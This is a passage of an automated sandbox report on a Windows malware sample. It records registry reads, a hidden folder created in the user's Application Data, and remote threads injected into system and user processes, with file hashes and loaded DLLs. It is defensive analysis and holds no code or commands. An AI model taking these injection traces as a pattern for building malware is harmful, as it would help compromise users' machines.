Value Name: [ TEMP ], Value: [ %SystemRoot%\TEMP ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ TMP ], Value: [ %SystemRoot%\TEMP ], 6 times
Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ],
Value Name: [ windir ], Value: [ %SystemRoot% ], 6 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters ],
Value Name: [ WinSock_Registry_Version ], Value: [ 2.0 ], 2 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 ],
Value Name: [ Num_Catalog_Entries ], Value: [ 3 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 ],
Value Name: [ Serial_Access_Num ], Value: [ 4 ], 2 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ DisplayString ], Value: [ Tcpip ], 4 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ Enabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ LibraryPath ], Value: [ %SystemRoot%\System32\mswsock.dll ], 2 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ ProviderId ], Value: [ 0x409d05229e7ecf11ae5a00aa00a7112b ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ StoresServiceClassInfo ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ SupportedNameSpace ], Value: [ 12 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ],
Value Name: [ Version ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ DisplayString ], Value: [ NTDS ], 4 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ Enabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ LibraryPath ], Value: [ %SystemRoot%\System32\winrnr.dll ], 2 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ ProviderId ], Value: [ 0xee37263b80e5cf11a55500c04fd8d4ac ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ StoresServiceClassInfo ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ SupportedNameSpace ], Value: [ 32 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ],
Value Name: [ Version ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ DisplayString ], Value: [ Network Location Awareness (NLA) Namespace ], 4 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ Enabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ LibraryPath ], Value: [ %SystemRoot%\System32\mswsock.dll ], 2 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ ProviderId ], Value: [ 0x3a244266a83ba64abaa52e0bd71fdd83 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ StoresServiceClassInfo ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ SupportedNameSpace ], Value: [ 15 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ],
Value Name: [ Version ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 ],
Value Name: [ Serial_Access_Num ], Value: [ 6 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Environment ],
Value Name: [ TEMP ], Value: [ %USERPROFILE%\Local Settings\Temp ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Environment ],
Value Name: [ TMP ], Value: [ %USERPROFILE%\Local Settings\Temp ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS ],
Value Name: [ EnableHttp1_1 ], Value: [ 1 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS ],
Value Name: [ EnableNegotiate ], Value: [ 1 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS ],
Value Name: [ GlobalUserOffline ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS ],
Value Name: [ MimeExclusionListForCache ], Value: [ multipart/mixed multipart/x-mixed-replace multipart/x-byteranges ], 4 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS ],
Value Name: [ WarnOnPost ], Value: [ 0x01000000 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ],
Value Name: [ EnableHttp1_1 ], Value: [ 1 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ],
Value Name: [ ParseAutoexec ], Value: [ 1 ], 3 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ AppData ], Value: [ %USERPROFILE%\Application Data ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings ],
Value Name: [ MigrateProxy ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings ],
Value Name: [ ProxyEnable ], Value: [ 0 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections ],
Value Name: [ DefaultConnectionSettings ], Value: [ 0x3c0000000300000001000000000000000000000000000000040000000000 ], 4 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections ],
Value Name: [ SavedLegacySettings ], Value: [ 0x3c0000001500000001000000000000000000000000000000040000000000 ], 8 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ APPDATA ], Value: [ C:\Documents and Settings\Administrator\Application Data ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ CLIENTNAME ], Value: [ Console ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ HOMEDRIVE ], Value: [ C: ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ HOMEPATH ], Value: [ \Documents and Settings\Administrator ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ HOMESHARE ], Value: [ ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ LOGONSERVER ], Value: [ \\PC ], 6 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ SESSIONNAME ], Value: [ Console ], 6 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Monitored Registry Keys:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SOFTWARE\MICROSOFT\TRACING\NETSHELL ],
Watch subtree: [ 0 ], Notify Filter: [ Attributes Change,Value Change,Security Descriptor Change ], 1 time
Key: [ HKLM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9 ],
Watch subtree: [ 0 ], Notify Filter: [ Key Change ], 1 time
Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ],
Watch subtree: [ 0 ], Notify Filter: [ Attributes Change,Value Change,Security Descriptor Change ], 2 times
Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 ],
Watch subtree: [ 0 ], Notify Filter: [ Key Change ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\\\\ ],
Watch subtree: [ 0 ], Notify Filter: [ Attributes Change,Value Change ], 2 times
[=============================================================================]
5.b) Explorer.EXE - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\Documents and Settings\Administrator\Application Data\A16126B3 ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
File Name: [ c:\autoexec.bat ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Directories Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Directory: [ C:\Documents and Settings\Administrator\Application Data\A16126B3 ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 29 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\WINDOWS\system32\RASAPI32.DLL ]
File Name: [ C:\WINDOWS\system32\TAPI32.dll ]
File Name: [ C:\WINDOWS\system32\rasman.dll ]
File Name: [ C:\WINDOWS\system32\sensapi.dll ]
[=============================================================================]
5.c) Explorer.EXE - Process Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Remote Threads Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Affected Process: [ C:\WINDOWS\system32\ctfmon.exe ]
Affected Process: [ C:\Program Files\Messenger\msmsgs.exe ]
Affected Process: [ C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe ]
Affected Process: [ C:\WINDOWS\system32\wscntfy.exe ]
Affected Process: [ C:\Program Files\Common Files\kxuckd.exe ]
Affected Process: [ C:\Program Files\Common Files\drlwszvxbeo.exe ]
Affected Process: [ C:\WINDOWS\system32\cmd.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Foreign Memory Regions Written:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Process: [ C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe ]
Process: [ C:\Program Files\Common Files\drlwszvxbeo.exe ]
Process: [ C:\Program Files\Common Files\kxuckd.exe ]
Process: [ C:\Program Files\Messenger\msmsgs.exe ]
Process: [ C:\WINDOWS\system32\cmd.exe ]
Process: [ C:\WINDOWS\system32\ctfmon.exe ]
Process: [ C:\WINDOWS\system32\wscntfy.exe ]
[=============================================================================]
5.d) Explorer.EXE - Other Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Mutexes Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Mutex: [ Local\I0000055C ]
Mutex: [ Local\M0000055C ]
Mutex: [ Local\R7CB9D1B4 ]
Mutex: [ Local\S7CB9D1B4 ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Keyboard Keys Monitored:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Virtual Key Code: [ VK_LBUTTON (1) ], 46 times
[#############################################################################]
6. ctfmon.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Explorer.EXE wrote to the virtual memory of this process
Filename: ctfmon.exe
MD5: 5f1d5f88303d4a4dbc8e5f97ba967cc3
SHA-1: 99cb7370f16773c8e2d0c86fe805ec638ab126e9
File Size: 15360 Bytes
Command Line: "C:\WINDOWS\system32\ctfmon.exe"
Process-status
at analysis end: alive
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
Module Name: [ C:\WINDOWS\system32\MSUTB.dll ],
Base Address: [0x5FC10000 ], Size: [0x00033000 ]
Module Name: [ C:\WINDOWS\system32\ShimEng.dll ],
Base Address: [0x5CB70000 ], Size: [0x00026000 ]
Module Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ],
Base Address: [0x6F880000 ], Size: [0x001CA000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\system32\ole32.dll ],
Base Address: [0x774E0000 ], Size: [0x0013D000 ]
Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
Base Address: [0x77120000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\system32\MSACM32.dll ],
Base Address: [0x77BE0000 ], Size: [0x00015000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\USERENV.dll ],
Base Address: [0x769C0000 ], Size: [0x000B4000 ]
Module Name: [ C:\WINDOWS\system32\UxTheme.dll ],
Base Address: [0x5AD70000 ], Size: [0x00038000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
[=============================================================================]
6.a) ctfmon.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
[=============================================================================]
6.b) ctfmon.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[#############################################################################]
7. msmsgs.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Explorer.EXE wrote to the virtual memory of this process
Filename: msmsgs.exe
MD5: 3e930c641079443d4de036167a69caa2
SHA-1: ac40479e28fb680aff76e41fa14ebe18b3392629
File Size: 1695232 Bytes
Command Line: "C:\Program Files\Messenger\msmsgs.exe" /background
Process-status
at analysis end: alive
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\WSOCK32.dll ],
Base Address: [0x71AD0000 ], Size: [0x00009000 ]
Module Name: [ C:\WINDOWS\system32\WS2_32.dll ],
Base Address: [0x71AB0000 ], Size: [0x00017000 ]
Module Name: [ C:\WINDOWS\system32\WS2HELP.dll ],
Base Address: [0x71AA0000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\ole32.dll ],
Base Address: [0x774E0000 ], Size: [0x0013D000 ]
Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
Base Address: [0x77120000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\WinSxS\X86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\COMCTL32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\comdlg32.dll ],
Base Address: [0x763B0000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.5512_x-ww_dfb54e0c\gdiplus.dll ],
Base Address: [0x4EC50000 ], Size: [0x001A6000 ]
Module Name: [ C:\WINDOWS\system32\MSIMG32.dll ],
Base Address: [0x76380000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\system32\NETAPI32.dll ],
Base Address: [0x5B860000 ], Size: [0x00055000 ]
Module Name: [ C:\WINDOWS\system32\WININET.dll ],
Base Address: [0x771B0000 ], Size: [0x000AA000 ]
Module Name: [ C:\WINDOWS\system32\CRYPT32.dll ],
Base Address: [0x77A80000 ], Size: [0x00095000 ]
Module Name: [ C:\WINDOWS\system32\MSASN1.dll ],
Base Address: [0x77B20000 ], Size: [0x00012000 ]
Module Name: [ C:\WINDOWS\system32\cryptdll.dll ],
Base Address: [0x76790000 ], Size: [0x0000C000 ]
Module Name: [ C:\WINDOWS\system32\iphlpapi.dll ],
Base Address: [0x76D60000 ], Size: [0x00019000 ]
Module Name: [ C:\WINDOWS\system32\XPOB2RES.DLL ],
Base Address: [0x10000000 ], Size: [0x0006C000 ]
Module Name: [ C:\WINDOWS\system32\CLBCATQ.DLL ],
Base Address: [0x76FD0000 ], Size: [0x0007F000 ]
Module Name: [ C:\WINDOWS\system32\COMRes.dll ],
Base Address: [0x77050000 ], Size: [0x000C5000 ]
Module Name: [ C:\WINDOWS\system32\xpsp2res.dll ],
Base Address: [0x00890000 ], Size: [0x002C5000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
Module Name: [ C:\WINDOWS\system32\SXS.DLL ],
Base Address: [0x7E720000 ], Size: [0x000B0000 ]
Module Name: [ C:\WINDOWS\system32\es.dll ],
Base Address: [0x77710000 ], Size: [0x00042000 ]
Module Name: [ C:\WINDOWS\system32\wtsapi32.dll ],
Base Address: [0x76F50000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\WINSTA.dll ],
Base Address: [0x76360000 ], Size: [0x00010000 ]
Module Name: [ C:\WINDOWS\system32\credui.dll ],
Base Address: [0x76C00000 ], Size: [0x0002E000 ]
[=============================================================================]
7.a) msmsgs.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SOFTWARE\CLASSES\CLSID\{00020420-0000-0000-C000-000000000046}\INPROCSERVER32 ],
Value Name: [ ], Value: [ oleaut32.dll ], 3 times
Key: [ HKLM\SOFTWARE\CLASSES\CLSID\{00020420-0000-0000-C000-000000000046}\INPROCSERVER32 ],
Value Name: [ ThreadingModel ], Value: [ Both ], 1 time
Key: [ HKLM\SOFTWARE\CLASSES\CLSID\{00020424-0000-0000-C000-000000000046}\INPROCSERVER32 ],
Value Name: [ ], Value: [ oleaut32.dll ], 3 times
Key: [ HKLM\SOFTWARE\CLASSES\CLSID\{00020424-0000-0000-C000-000000000046}\INPROCSERVER32 ],
Value Name: [ ThreadingModel ], Value: [ Both ], 1 time
Key: [ HKLM\SOFTWARE\CLASSES\INTERFACE\{00020400-0000-0000-C000-000000000046}\PROXYSTUBCLSID32 ],
Value Name: [ ], Value: [ {00020420-0000-0000-C000-000000000046} ], 1 time
Key: [ HKLM\SOFTWARE\CLASSES\INTERFACE\{D597BAB1-5B9F-11D1-8DD2-00AA004ABD5E}\PROXYSTUBCLSID32 ],
Value Name: [ ], Value: [ {00020424-0000-0000-C000-000000000046} ], 3 times
Key: [ HKLM\SOFTWARE\CLASSES\INTERFACE\{D597BAB1-5B9F-11D1-8DD2-00AA004ABD5E}\TYPELIB ],
Value Name: [ ], Value: [ {D597DEED-5B9F-11D1-8DD2-00AA004ABD5E} ], 2 times
Key: [ HKLM\SOFTWARE\CLASSES\INTERFACE\{D597BAB1-5B9F-11D1-8DD2-00AA004ABD5E}\TYPELIB ],
Value Name: [ Version ], Value: [ 2.0 ], 2 times
Key: [ HKLM\SOFTWARE\CLASSES\TYPELIB\{00020430-0000-0000-C000-000000000046}\2.0\0\WIN32 ],
Value Name: [ ], Value: [ C:\WINDOWS\system32\stdole2.tlb ], 1 time
Key: [ HKLM\SOFTWARE\CLASSES\TYPELIB\{D597DEED-5B9F-11D1-8DD2-00AA004ABD5E}\2.0\0\WIN32 ],
Value Name: [ ], Value: [ C:\WINDOWS\system32\SENS.DLL ], 2 times
Key: [ HKLM\Software\Microsoft\COM3 ],
Value Name: [ REGDBVersion ], Value: [ 0x0b00000000000000 ], 12 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Monitored Registry Keys:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKU ],
Watch subtree: [ 1 ], Notify Filter: [ Key Change,Value Change ], 4 times
[=============================================================================]
7.b) msmsgs.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\WINDOWS\system32\SENS.DLL ]
File Name: [ C:\WINDOWS\system32\stdole2.tlb ]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
